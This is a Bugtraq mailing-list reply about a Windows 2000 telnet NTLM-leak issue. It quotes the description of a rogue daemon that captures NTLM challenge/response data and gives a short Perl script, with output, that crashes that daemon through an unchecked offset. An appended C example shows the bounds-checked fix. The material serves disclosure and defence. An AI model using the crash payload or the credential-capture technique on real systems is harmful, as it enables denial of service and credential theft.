Bugtraq mailing list archives

Re: Win2k Telnet.exe malicious server vulnerability


From: Jim Paris <jim () JTAN COM>
Date: Thu, 14 Sep 2000 12:04:09 -0400

/* NTLM telnetD v0.8

   Snarfs NTLM challenge/response by convincing w2k telnet client to
   auto-authenticate.
   Outputs auth-data in LophtCrack sniff format on stdout.

   compile: gcc -o w2kteld ntlm_telnetd.c
   run: ./w2kteld

   Then wait for w2k to telnet to you.
   for the impatient, there are always ways of making w2k telnet!

...
<snip>

And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)

sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections

Connection from: 127.0.0.1
Got NTLM response token
[1]+  Segmentation fault      ./ntlm_telnetd -l 1234
sardegna:~$

We are so batman.  And now I'm late for class.  (grr, 6.003)

-jim


#!/usr/bin/perl -w
#
# anti-ntlm-telnetd by jim@jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->recv($msg,1024);
$s->send("\xff\xfb\x25");
$s->recv($msg,1024);
$s->send("\xff\xfd");
$s->send("A"x7 .               # foo
         "\xFF" .              # length (passed to gettoken)
         "A"x7 .               # bar
         "NTLMSSP\0\x03" .     # protocol and type
         "A"x29 .              # baz
         "\xDE\xAD\xBE\xEF");  # rp->upos
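The crash above comes from one missing check: an offset taken straight from the client's type-3 token is added to a buffer pointer without first being compared against the length of what was actually received. The C below is an added example (not from this post and not from ntlm_telnetd) of the bounds-checked version of that step. It assumes the NTLM message layout from MS-NLMP (8-byte "NTLMSSP\0" signature, 32-bit little-endian message type, then security-buffer descriptors made of a 16-bit length, a 16-bit maximum length and a 32-bit offset from the start of the message); whether rp->upos in the daemon is exactly such a descriptor offset is also an assumption. Both token byte arrays are constructed for the example, the second one carrying the same 0xDEADBEEF offset the Perl script sends.

```c
/* Bounds-checked resolution of an NTLM security buffer.
 * Added example, not code from the original post or from ntlm_telnetd.
 * Layout assumed from MS-NLMP; see the lead-in. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define NTLM_SIG      "NTLMSSP"   /* 7 characters plus NUL: 8 bytes on the wire */
#define NTLM_SIG_LEN  8
#define NTLM_TYPE3    3
#define NTLM_HDR_LEN  12          /* signature (8) + message type (4, little-endian) */
#define SECBUF_LEN    8           /* len (2) + maxlen (2) + offset (4), little-endian */

enum ntlm_status {
    NTLM_OK = 0, NTLM_SHORT = 1, NTLM_BAD_SIG = 2, NTLM_BAD_TYPE = 3, NTLM_BAD_BOUNDS = 4
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Resolve the security-buffer descriptor at msg[desc_off] into a pointer and
 * length inside msg. Every attacker-controlled value is validated against
 * msg_len before it is used to derive a pointer; on failure *out is untouched. */
int ntlm_get_secbuf(const uint8_t *msg, size_t msg_len, size_t desc_off,
                    const uint8_t **out, size_t *out_len)
{
    uint16_t len;
    uint32_t off;

    if (msg_len < NTLM_HDR_LEN) return NTLM_SHORT;
    if (memcmp(msg, NTLM_SIG, NTLM_SIG_LEN) != 0) return NTLM_BAD_SIG;
    if (rd32(msg + NTLM_SIG_LEN) != NTLM_TYPE3) return NTLM_BAD_TYPE;
    /* The descriptor itself must fit; subtract rather than add so nothing wraps. */
    if (desc_off > msg_len || msg_len - desc_off < SECBUF_LEN) return NTLM_SHORT;

    len = rd16(msg + desc_off);        /* bytes 0-1: length (maxlen at 2-3 is ignored here) */
    off = rd32(msg + desc_off + 4);    /* bytes 4-7: offset from start of message */

    /* The check the rogue daemon lacked: both the offset and offset+len must
     * lie inside the received message. */
    if (off > msg_len || (size_t)len > msg_len - off) return NTLM_BAD_BOUNDS;

    *out = msg + off;
    *out_len = len;
    return NTLM_OK;
}

/* Constructed sample tokens (assumed layout, not captured traffic). Each is a
 * type-3 header followed by one descriptor at offset 12 and a 4-byte payload. */
static const uint8_t GOOD_TOKEN[] = {
    'N','T','L','M','S','S','P',0,  3,0,0,0,        /* signature, type 3            */
    4,0,  4,0,  20,0,0,0,                           /* len 4, maxlen 4, offset 20   */
    'A','B','C','D'                                 /* payload at offset 20         */
};
static const uint8_t BAD_TOKEN[] = {
    'N','T','L','M','S','S','P',0,  3,0,0,0,
    4,0,  4,0,  0xEF,0xBE,0xAD,0xDE,                /* offset 0xDEADBEEF, as in the script */
    'A','B','C','D'
};

/* Returns NTLM_OK only if the well-formed token resolves to the payload "ABCD". */
int check_good_token(void)
{
    const uint8_t *p; size_t n;
    int rc = ntlm_get_secbuf(GOOD_TOKEN, sizeof GOOD_TOKEN, NTLM_HDR_LEN, &p, &n);
    if (rc != NTLM_OK) return rc;
    return (n == 4 && memcmp(p, "ABCD", 4) == 0) ? NTLM_OK : -1;
}

/* Returns the status for the out-of-bounds offset: expected NTLM_BAD_BOUNDS. */
int check_bad_token(void)
{
    const uint8_t *p; size_t n;
    return ntlm_get_secbuf(BAD_TOKEN, sizeof BAD_TOKEN, NTLM_HDR_LEN, &p, &n);
}

int main(void)
{
    printf("well-formed token: status %d\n", check_good_token());
    printf("0xDEADBEEF offset: status %d\n", check_bad_token());
    return 0;
}
```

The two comparisons in the bounds check are written as subtractions from msg_len on purpose: computing `off + len` and comparing it to msg_len would let a large offset wrap around and pass, which is the same class of mistake as using the offset unchecked.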